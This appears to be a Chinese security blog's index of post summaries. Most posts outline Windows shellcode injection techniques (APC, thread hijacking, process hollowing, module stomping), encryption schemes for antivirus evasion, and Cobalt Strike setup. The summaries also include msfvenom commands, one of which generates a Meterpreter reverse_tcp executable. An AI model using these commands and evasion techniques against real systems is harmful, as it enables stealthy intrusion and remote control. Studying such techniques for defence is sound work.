摘要:
之前工作的时候,遇到过病毒需要使用IDA python进行反混淆的问题,但是由于病毒的工作量较大、前置步骤多,没有很好的总结。 闲下来了,有空了,根据网上的Demo做个实验记录一下。 一、代码部分 混淆程序如下,VS编译即可: 源代码中asm需要添加斜杠表达连接,原文中未加入反斜杠,报错了。 #in 阅读全文
摘要:
Module Stomping注入 Module Stomping(又称为Module Overloading,又称为DLL Hollowing)技术 工作原理:将一些正常DLL注入到目标进程中,寻找 AddressOfEntryPoint,并使用Shellcode覆盖AddressOfEntryP 阅读全文
摘要:
APC Early Bird注入 1、创建傀儡进程 2、申请一段内存空间,写入Shellcode 3、QueueUserAPC添加APC队列 4、ResumeThread激活进程 #include <Windows.h> int main() { unsigned char buf[] = { 0x 阅读全文
摘要:
Thread Hijacking注入 通过线程劫持,注入远程进程 1、通过PID打开目标进程,并申请一段空间,写入shellcode 2、拍摄快照,遍历进程,打开ID 3、挂起该进程,保存线程变量,设置上下文为我们希望执行的Shellcode,恢复线程变量 4、ResumeThread激活程序继续执 阅读全文
摘要:
ProceHolling傀儡进程注入 1、CreateProcess创建傀儡进程 2、UnmapViewOfSection卸载傀儡进程的内存映射 3、CreateFile+ReadFile读取进程2 4、WriteProcessMemory将HEADER、区块、ImageBase进行替换 5、Set 阅读全文
摘要:
AddressOfEntryPoint入口点注入 通过修改进程入口点,进行Shellcode注入。 1、首先使用CreateProcess函数创建进程,并且将参数填写为CREATE_SUSPENDED这代表新进程的主线程被挂起了 2、然后定位AddressOfEntryPoint入口点,使用Writ 阅读全文
摘要:
APC注入 APC注入即异步过程调用,APC是一个链状的数据结构,可以让一个线程在其原本的执行步骤前执行其他代码,每个线程都维护一个APC链。当线程从等待状态苏醒后,自动检测自己的APC队列中是否存在APC过程。 只需要将目标的线程的APC队列中添加APC过程,为了提高命中率可以向线程的所有线程中添 阅读全文
摘要:
远程线程注入 生成一段Shellcode,用于弹出计算器,若注入成功,则弹出成功。 MSF命令如下: 弹出计算器CALC msfvenom -p windows/exec cmd=calc.exe -f raw -o shellcode.bin 弹出CMD msfvenom -p windows/e 阅读全文
摘要:
映像劫持,自动打开OD调试新进程 第一步:进入注册表项 计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options 第二步:新建项 名字为新进程名字,带exe,如ab 阅读全文
摘要:
VMware Win7 这里有个坑,在安装VMtools的时候,是失败的,我原来以为是镜像的问题,Windows 7镜像版本如果比较低,是安装不了VMtools的。在尝试更换高版本Windows 7后,我发现不是版本的问题,而是VMware16的问题。以前用的VMware15,没有碰到这个问题。微软 阅读全文
摘要:
Windows Java配置 1、JAVA_HOME JAVA_HOME C:\Program Files\Java\jdk1.8.0_281 2、CLASSPATH CLASSPATH .;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar; 3、pa 阅读全文
摘要:
Windows gcc安装教程 1、下载MinGW https://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download 2、安装 点击继续一直下一步 下载完后会打开一个界面叫 MinGW Instal 阅读全文
摘要:
注册表 注册表逻辑结构 HKEY_USER 存放本地计算机口令列表的用户标识和密码列表。存放每个用户的预配置信息。 HKEY_CURRENT_USER 存放的当前登录的用户信息,包括用户登录名和暂存的密码。 HKEY_CURRENT_CONFIG 存放定义当前用户的琢磨配置数据,最后使用的文档列表和 阅读全文
摘要:
生成UUID的Python脚本: import uuid shellcode=b"" list = [] for i in range(50): bytes_a = shellcode[i * 16: 16 + i * 16] b = uuid.UUID(bytes_le=bytes_a) list 阅读全文
摘要:
Shellcode生成器: buf是CS生成的Shellcode #include "Caesar.h" #include "Base64.h" #include "RC4.h" int main() { unsigned char buf[] = "" unsigned char* buf1; i 阅读全文
摘要:
MSF生成EXE: msfvenom -p 有效载荷 -f 输出格式 -o 输出文件 msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe MSF生成Shellcode: msfvenom -a 系统架构 --platfo 阅读全文
摘要:
安全测试中,将一台虚拟机作为服务器,同时也可以作为客户机。 1、将服务器打开 ./teamserver 192.168.204.148 kali 2、启动客户端 中文插件打开: java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX: 阅读全文
摘要:
通过数据表替换,将6位拓展为8位,进行替换,总长度增加1/3。 #pragma once #include<stdio.h> #include<stdlib.h> #include <string.h> unsigned char* Base64_Encode(unsigned char* strI 阅读全文
摘要:
对称加密方法RC4 通过置换和流加密处理进行加密。 #pragma once #include<stdio.h> /* RC4初始化函数 */ void RC4_Init(unsigned char* s, unsigned char* key, unsigned long Len_k) { int 阅读全文
摘要:
古典加密方案,通过对字符简单的增加x,来进行加密。 免杀使用的时候,顺手可以加个亦或进去,增加点复杂度。 #pragma once #include<stdio.h> void Caesar_Encryption(unsigned char *strInput,int nLength, int nO 阅读全文
摘要:
通过使用直接加载的方式来加载shellcode,是最初始的免杀手段。 不过随着对抗的加剧,该方法现在已经不再实用。 #include <stdio.h> #include <stdlib.h> #pragma comment( linker, "/subsystem:\"windows\" /ent 阅读全文
摘要:
问题一:16位、32位、64位操作系统有几个寄存器,分别是什么作用。 16 位CPU 所含有的寄存器共有14个: 4 个数据寄存器(AX 、BX 、CX 和DX) 2 个变址和指针寄存器(SI 和 DI) 2 个指针寄存器(SP堆栈指针寄存器和BP基指针寄存器) 4 个段寄存器(CS、DS、ES、S 阅读全文
摘要:
在VC6.0下,建立工程,若直接输入浮点型数字,编译器会扫描整个程序,若未发现浮点型运算,则浮点协处理器不会展开。 导致下面程序报错。 修改方法:按照项目规范先初始化赋初值再赋值。 阅读全文
摘要:
这个网站我极力推荐,可以浏览相关视、音频,学习英语口语。 https://www.youzack.com/ 阅读全文
摘要:
大学快结束的时候和同学一起写的,使用Latex编辑,原意是给母校留下一些东西,每个年纪不断编辑,慢慢壮大。 不过由于精力不足、个人影响力有限等问题,无法继续加深内容和继续更新。 内容也比较浅,算是闲暇时候的善意之举了。也很感谢我的两个朋友,帮我实现这个梦想。 安徽大学信息安全入门导论 点击下载 阅读全文